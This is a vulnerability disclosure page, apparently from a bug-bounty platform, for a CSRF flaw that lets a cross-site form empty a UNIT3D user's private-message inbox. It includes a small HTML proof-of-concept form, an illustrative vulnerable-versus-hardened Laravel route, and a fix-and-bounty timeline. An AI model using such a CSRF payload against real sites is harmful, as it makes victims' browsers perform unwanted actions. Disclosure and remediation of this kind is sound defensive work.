Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Oct 9th 2021


Description

There is a CSRF vulnerability in the Empty Inbox action of the Private Messages inbox: the action is triggered by a plain request to /mail/empty-inbox with no anti-CSRF token, so a page on another origin can make a logged-in user's browser empty their inbox.

Proof of Concept

//POC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://unit3d.site/mail/empty-inbox">
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
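The PoC works because a state-changing action is reachable with a token-less request that the victim's browser sends with its session cookie. Below, as an added illustration that is not the project's own code or the merged fix, is the exposed pattern next to a Laravel route and form that defeat it; the controller class, route name and template markup are assumptions.

```php
<?php
// routes/web.php (illustrative, not the project's actual routes file)

use App\Http\Controllers\PrivateMessageController; // assumed controller name
use Illuminate\Support\Facades\Route;

// Exposed pattern: a state change served on GET.
// A cross-site page can trigger it with a link, an <img>, or the GET form
// shown in the PoC above; the session cookie is attached automatically and
// no secret that the attacker's page lacks is required.
Route::get('/mail/empty-inbox', [PrivateMessageController::class, 'emptyInbox'])
    ->middleware('auth');

// Hardened pattern: only POST reaches the action. Laravel's VerifyCsrfToken
// middleware (part of the 'web' middleware group) rejects any POST whose
// _token field or X-CSRF-TOKEN header does not match the per-session token,
// and a cross-site form cannot read that token to include it. A GET to the
// URL now returns 405 instead of emptying the inbox.
Route::post('/mail/empty-inbox', [PrivateMessageController::class, 'emptyInbox'])
    ->middleware('auth')
    ->name('mail.empty-inbox');

// Template side (e.g. the button in inbox.blade.php, assumed markup):
// the button becomes a POST form and @csrf emits the hidden _token field.
/*
<form method="POST" action="{{ route('mail.empty-inbox') }}">
    @csrf
    <button type="submit">Empty inbox</button>
</form>
*/
```

If the action is also exposed as an API endpoint, the same check applies there: require a non-GET method and a token or same-origin proof rather than relying on the session cookie alone.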
We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 months ago
HDVinnie validated this vulnerability 2 months ago
amammad has been awarded the disclosure bounty
The fix bounty is now up for grabs
HDVinnie confirmed that a fix has been merged on 63ae97 2 months ago
HDVinnie has been awarded the fix bounty
inbox.blade.php#L39 has been validated
amammad
a month ago

Researcher


Hey maintainer,

Can I ask you to increase the bounty, please?